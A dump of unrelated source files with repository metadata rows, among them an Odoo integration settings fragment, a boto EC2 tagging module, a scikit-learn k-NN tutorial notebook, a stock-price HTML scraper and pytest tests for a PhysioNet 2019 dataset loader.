    # parameter name defined in the Cenit shared collection.
    'api_key': 'api_key',
}
class CenitIntegrationSettings(models.TransientModel):
_name = "cenit.city_context_api_1_0_0.settings"
_inherit = 'res.config.settings'
############################################################################
# Pull Parameters
############################################################################
    # NOTE: the generated template left the attribute name blank; 'api_key'
    # is a placeholder inferred from the field label
    api_key = fields.Char('API Key')
############################################################################
# Default Getters
############################################################################
    def get_default_api_key(self, cr, uid, ids, context=None):
        api_key = self.pool.get('ir.config_parameter').get_param(
            cr, uid, 'odoo_cenit.city_context_api_1_0_0.api_key',
            default=None, context=context
        )
        return {'api_key': api_key or ''}
############################################################################
# Default Setters
############################################################################
    def set_api_key(self, cr, uid, ids, context=None):
        config_parameters = self.pool.get('ir.config_parameter')
        for record in self.browse(cr, uid, ids, context=context):
            config_parameters.set_param(
                cr, uid, 'odoo_cenit.city_context_api_1_0_0.api_key',
                record.api_key or '', context=context
            )
############################################################################
# Actions
############################################################################
def execute(self, cr, uid, ids, context=None):
rc = super(CenitIntegrationSettings, self).execute(
cr, uid, ids, context=context
)
if not context.get('install', False):
return rc
objs = self.browse(cr, uid, ids)
if not objs:
return rc
obj = objs[0]
installer = self.pool.get('cenit.collection.installer')
data = installer.get_collection_data(
cr, uid,
COLLECTION_NAME,
version = COLLECTION_VERSION,
context = context
)
params = {}
for p in data.get('params'):
k = p.get('parameter')
id_ = p.get('id')
value = getattr(obj,COLLECTION_PARAMS.get(k))
params.update ({id_: value})
installer.pull_shared_collection(cr, uid, data.get('id'), params=params, context=context)
return rc
| [
"[email protected]"
] | |
191cfda6ce17fcbe41a235878917ff863d791458 | aa4394485f0148e1860d51cedf12dc4e63b97c0a | /pymodel/samples/Socket/test_stepper.py | 3d2643fd662247b123d53d843dfb42ca04a57351 | [
"LicenseRef-scancode-public-domain"
] | permissive | sergey-lebedev/PyModel | 18b41cfb46ecc1dc7f60aa85f276a7a196660117 | c08696a48e18ae462f0e9348fa63ed4eb71cba4a | refs/heads/master | 2020-12-24T11:11:04.897810 | 2012-09-01T18:18:02 | 2012-09-01T18:18:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | """
Socket tests with stepper
"""
# Subsequent runs use different port numbers
# so output is not completely reproducible
cases = [
('Synchronous: no blocking, next action after send_all is send_return, etc.',
'pmt.py -s 4 -r 6 Socket NoBlockScenario -i Stepper'),
('Synchronous and deterministic: entire message is always sent, then received',
'pmt.py -s 4 -r 6 Socket SendAll NoBlockScenario -i Stepper'),
]
| [
"[email protected]"
] | |
5ead92b975df0c2494154d9582089733f632e2b7 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_17/models/api_client_response.py | 06eace511c986807c009b8503e2df4331826493e | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 3,904 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class ApiClientResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'items': 'list[ApiClient]'
}
attribute_map = {
'items': 'items'
}
required_args = {
}
def __init__(
self,
items=None, # type: List[models.ApiClient]
):
"""
Keyword args:
items (list[ApiClient]): Returns a list of all items after filtering. The values are displayed for each name where meaningful.
"""
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApiClientResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiClientResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
98d73d768d95e7de81737db0b42d9bb566795dd9 | 04b2e3cfb96c8e2b86f6da89baa5dfccbfb8ec10 | /noon50/extprice.py | bcd17cd69fb1eb5dd7e626d1f344e15c9e7b8280 | [] | no_license | danbikle/pd101 | 812e582c94d7006e54e45c70a05d07bf6b9af7e3 | 883d01b7431d796d6cb5cfbb2cde5113820cc050 | refs/heads/master | 2021-01-01T16:38:56.780737 | 2015-03-19T10:53:11 | 2015-03-19T10:53:11 | 32,036,907 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # /home/ann/pd101/noon50/extprice.py
# This script should extract recent date, prices from html
import bs4
import datetime
import pdb
soup = bs4.BeautifulSoup(open("/tmp/noon50/GSPC.html"))
span0 = soup.find(id="yfs_market_time")
date_l = span0.string.split(",")[:3]
date_s = date_l[1]+date_l[2]
mydt = datetime.datetime.strptime(date_s, " %b %d %Y")
mydt_s = mydt.strftime('%Y-%m-%d')
print('GSPC')
# GSPC needs special handling here:
span1 = soup.find(id="yfs_l10_^gspc")
gspc_price = span1.string.replace(',','')
gspc_s = mydt_s+','+gspc_price+"\n"
gspcf = open('GSPCrecent.csv','w')
gspcf.write(gspc_s)
gspcf.close()
# Loop over the remaining tickers (GSPC above needed special handling)
for tkr in ['GLD','TLT','FXI','EFA','XOM','IWM','EEM','MDY','EWJ']:
print(tkr)
ltkr = tkr.lower()
soup = bs4.BeautifulSoup(open("/tmp/noon50/"+tkr+".html"))
span1 = soup.find(id="yfs_l84_"+ltkr)
tkr_price = span1.string.replace(',','')
tkr_s = mydt_s+','+tkr_price+"\n"
tkrf = open(tkr+'recent.csv','w')
tkrf.write(tkr_s)
tkrf.close()
| [
"[email protected]"
] | |
5f18ecc28b0267329f9d79b90a9a9a57bdda2438 | 71736c1a5615a831ce777f4fb27e3bd77ad5d43b | /T4/T3/Produto.py | dcbcfe3b52e20f8759583fd2f90797608bb98151 | [] | no_license | Edu93Reis/aulaPoo-Python | 28e37d3fd38e7d7d4288cb0ae0e8f0f7c4b737c8 | 0c6b997b99c612756e41540a66a10e386588c2b3 | refs/heads/master | 2021-04-26T23:42:30.398947 | 2018-05-18T04:01:24 | 2018-05-18T04:01:24 | 123,842,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | from Imposto import Imposto
class Produto:
def __init__(self,__nome,__preco,__imposto):
self.__nome = __nome
self.__preco = __preco
self.__imposto = __imposto
def getPreco(self):
return self.__preco * self.__imposto.getAliquota()
def getNome(self):
return self.__nome
def setImposto(self, __imposto):
self.__imposto = __imposto
def getProduto(self):
print("Nome: ",self.getNome()," Preco: ",self.getPreco()) | [
"[email protected]"
] | |
13396b7606db239a39684081d2b0a4377b4dafda | f22219d709b6837f55fb101f4bfaf38e14998c3d | /venv/Scripts/pip-script.py | 1820aaac241c680ec0cffcc35d8e15675bfc6ea9 | [] | no_license | sauravraj1/hostel | 93b96b945223d40e286712cfe2d0fa260c2f1c3e | 9455f651350dd57f61e6cad13ca477c59cf16da9 | refs/heads/master | 2022-02-25T09:27:49.494727 | 2019-10-02T09:12:02 | 2019-10-02T09:12:02 | 212,297,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\saura\PycharmProjects\hostelallotment\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
b226aec3d2c171e08332729217421343ba3d10d2 | f2886acbe9991473dd94a3fd178ae4316b8227c4 | /UserAuthentication/models.py | 2a75ca826a0c679b0195ec319de56a2f4d5effc8 | [] | no_license | monyoudom/LookBackStory | 5166353c184952ee0305dfc80e7f4bf5a4b9a68b | 6411bcffc2f6df0f03de34dd5d8ae233fb7c99b2 | refs/heads/master | 2021-05-14T01:04:34.109118 | 2018-01-24T16:38:07 | 2018-01-24T16:38:07 | 116,554,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import Permission , User
from django.db import models
| [
"[email protected]"
] | |
bf207c6d8685f1e4144d0e88c4a6bc5f614bcf4c | 4ac834504ea323238fb5f3d5b5c8b65c8df6b32f | /Module+1.py | 5bcb7e233399e9c8256b23c815726ee93d8aecf9 | [] | no_license | velamen2009/ml_with_python | e9aa4a2aadc8aa80052115201d98c8de7701201c | ebecc750291b8fdeaa1a1a7693f03fba3c97a256 | refs/heads/master | 2020-03-06T20:36:51.483422 | 2018-03-27T23:30:20 | 2018-03-27T23:30:20 | 127,057,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,158 | py |
# coding: utf-8
# ---
#
# _You are currently looking at **version 1.0** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-machine-learning/resources/bANLa) course resource._
#
# ---
# ## Applied Machine Learning, Module 1: A simple classification task
# ### Import required modules and load data file
# In[15]:
get_ipython().magic('matplotlib notebook')
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
fruits = pd.read_table('fruit_data_with_colors.txt')
# In[16]:
fruits.head()
# In[17]:
# create a mapping from fruit label value to fruit name to make results easier to interpret
lookup_fruit_name = dict(zip(fruits.fruit_label.unique(), fruits.fruit_name.unique()))
lookup_fruit_name
# The file contains the mass, height, and width of a selection of oranges, lemons and apples. The heights were measured along the core of the fruit. The widths were the widest width perpendicular to the height.
# ### Examining the data
# In[18]:
# plotting a scatter matrix
from matplotlib import cm
X = fruits[['height', 'width', 'mass', 'color_score']]
y = fruits['fruit_label']
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
cmap = cm.get_cmap('gnuplot')
# pd.scatter_matrix was removed in later pandas releases;
# pd.plotting.scatter_matrix is the equivalent call
scatter = pd.plotting.scatter_matrix(X_train, c=y_train, marker='o', s=40,
                                     hist_kwds={'bins': 15}, figsize=(9, 9),
                                     cmap=cmap)
# In[5]:
# plotting a 3D scatter plot
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection = '3d')
ax.scatter(X_train['width'], X_train['height'], X_train['color_score'], c = y_train, marker = 'o', s=100)
ax.set_xlabel('width')
ax.set_ylabel('height')
ax.set_zlabel('color_score')
plt.show()
# ### Create train-test split
# In[6]:
# For this example, we use the mass, width, and height features of each fruit instance
X = fruits[['mass', 'width', 'height']]
y = fruits['fruit_label']
# default is 75% / 25% train-test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
# ### Create classifier object
# In[7]:
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors = 5)
# ### Train the classifier (fit the estimator) using the training data
# In[8]:
knn.fit(X_train, y_train)
# ### Estimate the accuracy of the classifier on future data, using the test data
# In[9]:
knn.score(X_test, y_test)
# ### Use the trained k-NN classifier model to classify new, previously unseen objects
# In[10]:
# first example: a small fruit with mass 20g, width 4.3 cm, height 5.5 cm
fruit_prediction = knn.predict([[20, 4.3, 5.5]])
lookup_fruit_name[fruit_prediction[0]]
# In[11]:
# second example: a larger, elongated fruit with mass 100g, width 6.3 cm, height 8.5 cm
fruit_prediction = knn.predict([[100, 6.3, 8.5]])
lookup_fruit_name[fruit_prediction[0]]
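# The classifier can also report neighbour-vote probabilities for the same
# example; column order follows knn.classes_ (a sketch, not in the original
# notebook):
# knn.predict_proba([[100, 6.3, 8.5]])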
# ### Plot the decision boundaries of the k-NN classifier
# In[12]:
from adspy_shared_utilities import plot_fruit_knn
plot_fruit_knn(X_train, y_train, 5, 'uniform') # we choose 5 nearest neighbors
# ### How sensitive is k-NN classification accuracy to the choice of the 'k' parameter?
# In[13]:
k_range = range(1,20)
scores = []
for k in k_range:
knn = KNeighborsClassifier(n_neighbors = k)
knn.fit(X_train, y_train)
scores.append(knn.score(X_test, y_test))
plt.figure()
plt.xlabel('k')
plt.ylabel('accuracy')
plt.scatter(k_range, scores)
plt.xticks([0,5,10,15,20]);
# ### How sensitive is k-NN classification accuracy to the train/test split proportion?
# In[14]:
t = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2]
knn = KNeighborsClassifier(n_neighbors = 5)
plt.figure()
for s in t:
scores = []
for i in range(1,1000):
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1-s)
knn.fit(X_train, y_train)
scores.append(knn.score(X_test, y_test))
plt.plot(s, np.mean(scores), 'bo')
plt.xlabel('Training set proportion (%)')
plt.ylabel('accuracy');
# In[ ]:
# In[ ]:
| [
"[email protected]"
] | |
795a0b46e9357483c03125a7d8cc6fb63eb4b43e | 240acd20a7036636ac1b763900467401e3b5ee8c | /OCR/picam_cv/camera.py | d34c1d0f7127cefd5ba3ca4b03f84c504af62735 | [] | no_license | ycchae/6thKoreaHackathon | 5d835ab6827555e3ac6bd62bd2aaa18e8668084a | d108b5125806f2538bb9c4144b1a289189994522 | refs/heads/master | 2022-03-11T11:34:06.738640 | 2019-08-31T20:14:36 | 2019-08-31T20:14:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | from picamera import PiCamera
from ocr import Recognition
camera = PiCamera()
#camera.start_preview()
cnt = 1
recogtest = Recognition()
path = 'image10.png'
result=recogtest.ExtractNumber(path)
print(result)
'''
while True:
x = raw_input()
if x == "s":
# camera.stop_preview()
break
elif x == "c":
path = '/home/plate/Desktop/image'+str(cnt)+'.png'
# camera.capture(path)
result=recogtest.ExtractNumber(path)
# cnt += 1
print(result)
else:
print(x)
'''
| [
"[email protected]"
] | |
7df9e6788dbba56456f6f0e385d1683ce9c94950 | 58d8b2b9a1ece8cc06a2997f731a17f22edacbf0 | /cipher/plugins/vision/actions.py | c430556688ec6a0c5713935b0fbde9985d023011 | [] | no_license | valorun/CIPHER | 2c67a7b6eee1f8a593c07cb594dd922f805a468e | e7d1aef66470477d5788c2dc11c7370284a6bdf4 | refs/heads/master | 2023-07-24T04:05:54.000846 | 2022-07-24T09:36:37 | 2022-07-24T09:36:37 | 137,410,300 | 0 | 0 | null | 2023-07-18T21:53:21 | 2018-06-14T21:15:53 | Python | UTF-8 | Python | false | false | 451 | py | from cipher.core.actions import SpeechAction, CUSTOM_ACTIONS
from cipher import mqtt
class DetectObjectsAction(SpeechAction):
display_name = 'Détecter les objets'
@staticmethod
def get_parameters():
return []
@staticmethod
def check_parameters():
return True, None
@staticmethod
def execute():
mqtt.publish('client/vision/detect_objects')
CUSTOM_ACTIONS['camera_detect'] = DetectObjectsAction | [
"[email protected]"
] | |
0b2f37abadd3f1ede48d50d9364c44b7e4777b20 | 11cd362cdd78c2fc48042ed203614b201ac94aa6 | /desktop/core/ext-py3/boto-2.49.0/boto/ec2/ec2object.py | fa50a9fcc7e793e0c6e8a39ad3b52ba7f6692bef | [
"CC-BY-3.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0",
"Unlicense",
"LGPL-3.0-only",
"CC0-1.0",
"LicenseRef-scancode-other-permissive",
"CNRI-Python",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"Python-2.0",
"GPL-3.0-only",
"CC-BY-4.0",
"LicenseRef-scancode-jpython-1.1",
"AFL-2.1",
"JSON",
"WTFPL",
"MIT",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-jython",
"GPL-3.0-or-later",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LGPL-3.0-or-later",
"Zlib",
"LicenseRef-scancode-free-unknown",
"Classpath-exception-2.0",
"LicenseRef-scancode-proprietary-license",
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"MPL-2.0",
"ISC",
"GPL-2.0-only",
"ZPL-2.1",
"BSL-1.0",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Xnet",
"BSD-2-Clause"
] | permissive | cloudera/hue | b42343d0e03d2936b5a9a32f8ddb3e9c5c80c908 | dccb9467675c67b9c3399fc76c5de6d31bfb8255 | refs/heads/master | 2023-08-31T06:49:25.724501 | 2023-08-28T20:45:00 | 2023-08-28T20:45:00 | 732,593 | 5,655 | 2,244 | Apache-2.0 | 2023-09-14T03:05:41 | 2010-06-21T19:46:51 | JavaScript | UTF-8 | Python | false | false | 5,554 | py | # Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an EC2 Object
"""
from boto.ec2.tag import TagSet
class EC2Object(object):
def __init__(self, connection=None):
self.connection = connection
if self.connection and hasattr(self.connection, 'region'):
self.region = connection.region
else:
self.region = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
setattr(self, name, value)
class TaggedEC2Object(EC2Object):
"""
Any EC2 resource that can be tagged should be represented
by a Python object that subclasses this class. This class
has the mechanism in place to handle the tagSet element in
the Describe* responses. If tags are found, it will create
a TagSet object and allow it to parse and collect the tags
into a dict that is stored in the "tags" attribute of the
object.
"""
def __init__(self, connection=None):
super(TaggedEC2Object, self).__init__(connection)
self.tags = TagSet()
def startElement(self, name, attrs, connection):
if name == 'tagSet':
return self.tags
else:
return None
def add_tag(self, key, value='', dry_run=False):
"""
Add a tag to this object. Tags are stored by AWS and can be used
to organize and filter resources. Adding a tag involves a round-trip
to the EC2 service.
:type key: str
:param key: The key or name of the tag being stored.
:type value: str
:param value: An optional value that can be stored with the tag.
If you want only the tag name and no value, the
value should be the empty string.
"""
self.add_tags({key: value}, dry_run)
def add_tags(self, tags, dry_run=False):
"""
Add tags to this object. Tags are stored by AWS and can be used
to organize and filter resources. Adding tags involves a round-trip
to the EC2 service.
:type tags: dict
:param tags: A dictionary of key-value pairs for the tags being stored.
If for some tags you want only the name and no value, the
corresponding value for that tag name should be an empty
string.
"""
status = self.connection.create_tags(
[self.id],
tags,
dry_run=dry_run
)
if self.tags is None:
self.tags = TagSet()
self.tags.update(tags)
def remove_tag(self, key, value=None, dry_run=False):
"""
Remove a tag from this object. Removing a tag involves a round-trip
to the EC2 service.
:type key: str
:param key: The key or name of the tag being stored.
:type value: str
:param value: An optional value that can be stored with the tag.
If a value is provided, it must match the value currently
stored in EC2. If not, the tag will not be removed. If
a value of None is provided, the tag will be
unconditionally deleted.
NOTE: There is an important distinction between a value
of '' and a value of None.
"""
self.remove_tags({key: value}, dry_run)
def remove_tags(self, tags, dry_run=False):
"""
Removes tags from this object. Removing tags involves a round-trip
to the EC2 service.
:type tags: dict
:param tags: A dictionary of key-value pairs for the tags being removed.
For each key, the provided value must match the value
currently stored in EC2. If not, that particular tag will
not be removed. However, if a value of None is provided,
the tag will be unconditionally deleted.
NOTE: There is an important distinction between a value of
'' and a value of None.
"""
status = self.connection.delete_tags(
[self.id],
tags,
dry_run=dry_run
)
for key, value in tags.items():
if key in self.tags:
if value is None or value == self.tags[key]:
del self.tags[key]
| [
"[email protected]"
] | |
2663a2f227caad101fd64308204e17390ed99e5e | 81419798a85127c3450e1e0342013c7a395c0b40 | /pset6/cash/cash.py | 5c18475340294b34949bc336d24f7b56f2ee5a5f | [
"MIT"
] | permissive | ctemelkuran/cs50 | 64fd1d5e665c746dee76744443dec5d83b5fb719 | 6b1e238e0716b04d8d1dbae61c6625a52dcf6e46 | refs/heads/main | 2023-01-30T15:32:27.298807 | 2020-12-13T07:30:40 | 2020-12-13T07:30:40 | 311,726,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | from cs50 import get_float
while True:
dollars = get_float("Enter the owed amount:")
if dollars >= 0:
break
cents = (dollars * 100)
total = 0
for coin in [25, 10, 5, 1]:
total += int(cents // coin)
cents %= coin
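# Greedy works because US coin denominations are canonical: taking the
# largest coin first never costs extra coins overall. E.g. 41 cents ->
# 1 quarter + 1 dime + 1 nickel + 1 penny = 4 coins.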
print(total) | [
"[email protected]"
] | |
f4e1c16570dac9023580fc90b033598dd13d4df0 | 70dcd504ea152b5292d80728ca37c433ec41be4c | /tests/data_physionet2019_test.py | 07b067c2032e8f551d650705f17754e8bbe6dc1e | [
"MIT"
] | permissive | philipdarke/torchtime | 64f58f4267eace54ff9cdee9d9181192acf7c12c | c22d17ae41f1675f2e32b3b37fec60f93057a1e8 | refs/heads/main | 2023-06-30T05:19:39.697699 | 2023-06-13T10:30:27 | 2023-06-13T10:30:27 | 475,093,888 | 30 | 6 | MIT | 2023-03-12T15:53:02 | 2022-03-28T16:47:59 | Python | UTF-8 | Python | false | false | 19,073 | py | import re
import pytest
import torch
from torchtime.constants import OBJ_EXT
from torchtime.data import PhysioNet2019
from torchtime.utils import _get_SHA256
SEED = 456789
RTOL = 1e-4
ATOL = 1e-4
CHECKSUM_X = "6eb80cddc4eb4fe1c4cdcae8ad35becc75469737542ca66ac417fda90f3a1db3"
CHECKSUM_Y = "8fa4a9f7f8fc532aca0a9e0df6c6fe837c3ae3d070ceb28054259ff97c8241a5"
CHECKSUM_LENGTH = "829c06fb86444f2ca806371583cd38fe2d0e29b9045ae6a4cad306bd4f4fad1f"
class TestPhysioNet2019:
"""Test PhysioNet2019 class."""
def test_invalid_split_arg(self):
"""Catch invalid split argument."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'split' must be one of ['train', 'val']"),
):
PhysioNet2019(
split="xyz",
train_prop=0.8,
seed=SEED,
)
def test_invalid_split_size(self):
"""Catch invalid split sizes."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'train_prop' must be in range (0, 1)"),
):
PhysioNet2019(
split="train",
train_prop=-0.5,
seed=SEED,
)
def test_incompatible_split_size(self):
"""Catch incompatible split sizes."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'train_prop' must be in range (0, 1)"),
):
PhysioNet2019(
split="train",
train_prop=1,
seed=SEED,
)
new_prop = 0.5
with pytest.raises(
AssertionError,
match=re.escape(
"argument 'val_prop' must be in range (0, {})".format(1 - new_prop)
),
):
PhysioNet2019(
split="test",
train_prop=new_prop,
val_prop=new_prop,
seed=SEED,
)
def test_load_data(self):
"""Validate data set."""
PhysioNet2019(
split="train",
train_prop=0.7,
seed=SEED,
)
if CHECKSUM_X:
assert _get_SHA256(".torchtime/physionet_2019/X" + OBJ_EXT) == CHECKSUM_X
if CHECKSUM_Y:
assert _get_SHA256(".torchtime/physionet_2019/y" + OBJ_EXT) == CHECKSUM_Y
if CHECKSUM_LENGTH:
assert (
_get_SHA256(".torchtime/physionet_2019/length" + OBJ_EXT)
== CHECKSUM_LENGTH
)
def test_train_val(self):
"""Test training/validation split sizes."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 41])
assert dataset.y_train.shape == torch.Size([28236, 336, 1])
assert dataset.length_train.shape == torch.Size([28236])
assert dataset.X_val.shape == torch.Size([12100, 336, 41])
assert dataset.y_val.shape == torch.Size([12100, 336, 1])
assert dataset.length_val.shape == torch.Size([12100])
# Ensure no test data is returned
with pytest.raises(
AttributeError,
match=re.escape("'PhysioNet2019' object has no attribute 'X_test'"),
):
dataset.X_test
with pytest.raises(
AttributeError,
match=re.escape("'PhysioNet2019' object has no attribute 'y_test'"),
):
dataset.y_test
with pytest.raises(
AttributeError,
match=re.escape("'PhysioNet2019' object has no attribute 'length_test'"),
):
dataset.length_test
def test_train_val_test(self):
"""Test training/validation/test split sizes."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 41])
assert dataset.y_train.shape == torch.Size([28236, 336, 1])
assert dataset.length_train.shape == torch.Size([28236])
assert dataset.X_val.shape == torch.Size([8067, 336, 41])
assert dataset.y_val.shape == torch.Size([8067, 336, 1])
assert dataset.length_val.shape == torch.Size([8067])
assert dataset.X_test.shape == torch.Size([4033, 336, 41])
assert dataset.y_test.shape == torch.Size([4033, 336, 1])
assert dataset.length_test.shape == torch.Size([4033])
def test_train_split(self):
"""Test training split is returned."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_train, equal_nan=True)
assert torch.allclose(dataset.y, dataset.y_train, equal_nan=True)
assert torch.allclose(dataset.length, dataset.length_train, equal_nan=True)
def test_val_split(self):
"""Test validation split is returned."""
dataset = PhysioNet2019(
split="val",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_val, equal_nan=True)
assert torch.allclose(dataset.y, dataset.y_val, equal_nan=True)
assert torch.allclose(dataset.length, dataset.length_val, equal_nan=True)
def test_test_split(self):
"""Test test split is returned."""
dataset = PhysioNet2019(
split="test",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_test, equal_nan=True)
assert torch.allclose(dataset.y, dataset.y_test, equal_nan=True)
assert torch.allclose(dataset.length, dataset.length_test, equal_nan=True)
def test_length(self):
"""Test length attribute."""
dataset = PhysioNet2019(
split="test",
train_prop=0.7,
val_prop=0.2,
time=False,
seed=SEED,
)
for i, Xi in enumerate(dataset.X_train.unbind()):
length_i = dataset.length_train[i]
assert not torch.all(torch.isnan(Xi[length_i - 1]))
assert torch.all(torch.isnan(Xi[length_i:]))
for i, Xi in enumerate(dataset.X_val.unbind()):
length_i = dataset.length_val[i]
assert not torch.all(torch.isnan(Xi[length_i - 1]))
assert torch.all(torch.isnan(Xi[length_i:]))
for i, Xi in enumerate(dataset.X_test.unbind()):
length_i = dataset.length_test[i]
assert not torch.all(torch.isnan(Xi[length_i - 1]))
assert torch.all(torch.isnan(Xi[length_i:]))
def test_invalid_impute(self):
"""Catch invalid impute arguments."""
with pytest.raises(
AssertionError,
match=re.escape(
"argument 'impute' must be a string in ['none', 'zero', 'mean', 'forward'] or a function" # noqa: E501
),
):
PhysioNet2019(
split="train",
train_prop=0.7,
impute="blah",
seed=SEED,
)
with pytest.raises(
Exception,
match=re.escape(
"argument 'impute' must be a string in ['none', 'zero', 'mean', 'forward'] or a function" # noqa: E501
),
):
PhysioNet2019(
split="train",
train_prop=0.7,
impute=3,
seed=SEED,
)
def test_no_impute(self):
"""Test no imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="none",
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 366491058
assert torch.sum(torch.isnan(dataset.y_train)).item() == 8401181
assert torch.sum(torch.isnan(dataset.X_val)).item() == 104715681
assert torch.sum(torch.isnan(dataset.y_val)).item() == 2399984
assert torch.sum(torch.isnan(dataset.X_test)).item() == 52332856
assert torch.sum(torch.isnan(dataset.y_test)).item() == 1199521
